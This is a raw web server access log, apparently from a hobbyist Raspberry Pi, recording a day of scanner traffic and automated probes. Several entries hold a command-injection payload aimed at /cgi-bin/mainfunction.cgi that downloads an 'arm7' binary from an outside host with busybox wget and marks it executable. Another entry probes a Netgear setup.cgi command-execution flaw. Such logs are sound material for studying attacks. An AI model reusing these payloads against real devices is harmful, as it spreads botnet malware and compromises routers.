Thu Apr 2 06:25:06 MDT 2020 06:25:06 up 37 days, 10:53, 1 user, load average: 0.46, 0.28, 0.27 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT pi tty7 :0 24Feb20 37days 29:53 1.96s /usr/bin/lxsession -s LXDE-pi -e LXDE 103.93.172.31 - - [02/Apr/2020:13:19:21 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 13.90.16.161 - - [02/Apr/2020:13:29:20 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 162.243.129.58 - - [02/Apr/2020:13:35:01 +0000] "GET /ReportServer HTTP/1.1" 404 0 "" "Mozilla/5.0 zgrab/0.x" 96.56.205.210 - - [02/Apr/2020:14:05:34 +0000] "GET / HTTP/1.1" 400 0 "" "" 162.250.19.7 - - [02/Apr/2020:14:29:03 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 162.250.19.7 - - [02/Apr/2020:14:32:02 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 79.143.186.114 - - [02/Apr/2020:14:50:25 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" 159.65.11.106 - - [02/Apr/2020:15:11:00 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" 171.67.70.85 - - [02/Apr/2020:15:19:05 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x" 103.73.182.52 - - [02/Apr/2020:15:23:44 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 80.82.65.234 - - [02/Apr/2020:16:56:46 +0000] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 404 0 "" "Go-http-client/1.1" 202.168.64.24 - - [02/Apr/2020:17:29:06 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" 202.168.64.24 - - [02/Apr/2020:17:29:09 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" 80.82.65.234 - - [02/Apr/2020:18:00:47 +0000] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 404 0 "" "Go-http-client/1.1" 94.102.49.65 - - [02/Apr/2020:18:08:52 +0000] "GET / HTTP/1.1" 200 25000 "" "libwww-perl/6.43" 
186.64.111.98 - - [02/Apr/2020:19:38:45 +0000] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://192.3.45.185/arm7;${IFS}chmod${IFS}777${IFS}arm7 HTTP/1.1" 400 0 "" "" 186.64.111.98 - - [02/Apr/2020:19:38:45 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 110.249.212.46 - - [02/Apr/2020:20:10:08 +0000] "GET /testget?q=23333&port=80 HTTP/1.1" 404 0 "" "" 110.249.212.46 - - [02/Apr/2020:20:18:54 +0000] "GET /testget?q=23333&port=80 HTTP/1.1" 404 0 "" "" 110.249.212.46 - - [02/Apr/2020:20:18:54 +0000] "GET /testget?q=23333&port=80 HTTP/1.1" 404 0 "" "" 110.249.212.46 - - [02/Apr/2020:20:18:55 +0000] "GET /testget?q=23333&port=80 HTTP/1.1" 404 0 "" "" 122.224.131.186 - - [02/Apr/2020:21:12:33 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 122.224.131.186 - - [02/Apr/2020:21:12:34 +0000] "GET /TP/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 122.224.131.186 - - [02/Apr/2020:21:12:34 +0000] "GET /TP/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 122.224.131.186 - - [02/Apr/2020:21:12:35 +0000] "GET /thinkphp/html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 122.224.131.186 - - [02/Apr/2020:21:12:35 +0000] "GET /html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 122.224.131.186 - - [02/Apr/2020:21:12:36 +0000] "GET /public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 122.224.131.186 - - [02/Apr/2020:21:12:36 +0000] "GET /TP/html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 122.224.131.186 - - [02/Apr/2020:21:12:37 +0000] "GET /elrekt.php 
HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 122.224.131.186 - - [02/Apr/2020:21:12:38 +0000] "GET /index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 122.224.131.186 - - [02/Apr/2020:21:12:38 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 208.91.109.18 - - [02/Apr/2020:21:23:10 +0000] "UNKNOWN UNKNOWN" 0 0 "" "" 208.91.109.18 - - [02/Apr/2020:21:23:10 +0000] "HEAD /robots.txt HTTP/1.0" 200 0 "" "" 179.99.21.204 - - [02/Apr/2020:21:27:53 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 139.162.119.197 - - [02/Apr/2020:22:01:28 +0000] "GET / HTTP/1.1" 200 25000 "" "HTTP Banner Detection (https://security.ipip.net)" 192.241.239.112 - - [02/Apr/2020:22:16:03 +0000] "GET /portal/redlion HTTP/1.1" 404 0 "" "Mozilla/5.0 zgrab/0.x" 180.87.205.236 - - [02/Apr/2020:23:42:09 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 49.233.173.38 - - [03/Apr/2020:00:48:30 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 49.233.173.38 - - [03/Apr/2020:00:48:33 +0000] "GET /TP/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 49.233.173.38 - - [03/Apr/2020:00:48:35 +0000] "GET /TP/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 49.233.173.38 - - [03/Apr/2020:00:48:35 +0000] "GET /thinkphp/html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 49.233.173.38 - - [03/Apr/2020:00:48:36 +0000] "GET /html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 
6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 49.233.173.38 - - [03/Apr/2020:00:48:36 +0000] "GET /public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 49.233.173.38 - - [03/Apr/2020:00:48:37 +0000] "GET /TP/html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 49.233.173.38 - - [03/Apr/2020:00:48:37 +0000] "GET /elrekt.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 49.233.173.38 - - [03/Apr/2020:00:48:38 +0000] "GET /index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 49.233.173.38 - - [03/Apr/2020:00:48:38 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 201.124.137.39 - - [03/Apr/2020:00:50:06 +0000] "GET / HTTP/1.1" 400 0 "" "" 89.40.73.227 - - [03/Apr/2020:01:46:17 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0" 171.67.70.85 - - [03/Apr/2020:02:14:20 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x" 13.77.107.52 - - [03/Apr/2020:02:26:57 +0000] "HEAD /robots.txt HTTP/1.0" 200 0 "" "" 164.132.92.162 - - [03/Apr/2020:02:31:00 +0000] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://192.3.45.185/arm7;${IFS}chmod${IFS}777${IFS}arm7 HTTP/1.1" 400 0 "" "" 164.132.92.162 - - [03/Apr/2020:02:31:00 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 162.250.19.7 - - [03/Apr/2020:03:15:09 +0000] "GET /readme.txt HTTP/1.1" 304 0 "http://162.250.19.7/" "Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.36 (KHTML, like Gecko) Raspbian Chromium/72.0.3626.121 Chrome/72.0.3626.121 Safari/537.36" 162.250.19.7 - - 
[03/Apr/2020:03:15:42 +0000] "GET /ac0xl/logs/ HTTP/1.1" 200 25000 "http://162.250.19.7/ac0xl/" "Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.36 (KHTML, like Gecko) Raspbian Chromium/72.0.3626.121 Chrome/72.0.3626.121 Safari/537.36" 162.250.19.7 - - [03/Apr/2020:03:16:05 +0000] "GET /ac0xl/logs/2020.04.02 HTTP/1.1" 200 7546 "http://162.250.19.7/ac0xl/logs/" "Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.36 (KHTML, like Gecko) Raspbian Chromium/72.0.3626.121 Chrome/72.0.3626.121 Safari/537.36" 58.23.9.197 - - [03/Apr/2020:04:04:13 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 58.23.9.197 - - [03/Apr/2020:04:04:13 +0000] "GET /TP/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 58.23.9.197 - - [03/Apr/2020:04:04:14 +0000] "GET /TP/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 195.230.113.192 - - [03/Apr/2020:05:03:18 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 114.33.3.156 - - [03/Apr/2020:05:53:27 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 103.212.131.38 - - [03/Apr/2020:05:56:43 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 64.196.25.178 - - [03/Apr/2020:07:17:28 +0000] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://192.3.45.185/arm7;${IFS}chmod${IFS}777${IFS}arm7 HTTP/1.1" 400 0 "" "" 64.196.25.178 - - [03/Apr/2020:07:17:28 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 85.100.157.30 - - [03/Apr/2020:07:43:07 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) 
AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 189.211.214.132 - - [03/Apr/2020:07:46:23 +0000] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 404 0 "" "XTC BOTNET" 189.211.214.132 - - [03/Apr/2020:07:46:23 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 132.145.136.225 - - [03/Apr/2020:07:57:49 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 132.145.136.225 - - [03/Apr/2020:07:57:53 +0000] "GET /TP/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 132.145.136.225 - - [03/Apr/2020:07:57:53 +0000] "GET /TP/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 132.145.136.225 - - [03/Apr/2020:07:57:53 +0000] "GET /thinkphp/html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 132.145.136.225 - - [03/Apr/2020:07:57:53 +0000] "GET /html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 132.145.136.225 - - [03/Apr/2020:07:57:54 +0000] "GET /public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 132.145.136.225 - - [03/Apr/2020:07:57:54 +0000] "GET /TP/html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 132.145.136.225 - - [03/Apr/2020:07:57:54 +0000] "GET /elrekt.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 132.145.136.225 - - [03/Apr/2020:07:57:54 +0000] "GET /index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 132.145.136.225 - - [03/Apr/2020:07:57:54 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 177.131.125.163 - - [03/Apr/2020:08:04:32 +0000] "GET / 
HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 177.105.239.254 - - [03/Apr/2020:09:46:32 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 162.243.130.34 - - [03/Apr/2020:10:00:16 +0000] "GET /hudson HTTP/1.1" 404 0 "" "Mozilla/5.0 zgrab/0.x" 61.219.11.153 - - [03/Apr/2020:10:27:17 +0000] "UNKNOWN UNKNOWN" 0 0 "" "" 139.228.254.97 - - [03/Apr/2020:10:51:49 +0000] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox&curpath=/&currentsetting.htm=1 HTTP/1.1" 400 0 "" "Mozilla/5.0" 34.77.104.14 - - [03/Apr/2020:10:51:53 +0000] "GET / HTTP/1.1" 200 25000 "" "python-requests/2.18.4" 139.228.254.97 - - [03/Apr/2020:10:51:55 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 47.111.19.40 - - [03/Apr/2020:11:00:17 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 124.244.19.213 - - [03/Apr/2020:11:07:41 +0000] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://192.3.45.185/arm7;${IFS}chmod${IFS}777${IFS}arm7 HTTP/1.1" 400 0 "" "" 124.244.19.213 - - [03/Apr/2020:11:07:41 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 5.189.176.208 - - [03/Apr/2020:11:27:38 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" 171.67.70.85 - - [03/Apr/2020:11:29:05 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x" 189.147.96.217 - - [03/Apr/2020:11:49:54 +0000] "GET / HTTP/1.0" 200 25000 "" "" Fri Apr 3 06:25:06 MDT 2020 06:25:06 up 38 days, 10:53, 1 user, load average: 0.37, 0.26, 0.23 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT pi tty7 :0 24Feb20 38days 30:41 2.04s /usr/bin/lxsession -s LXDE-pi -e LXDE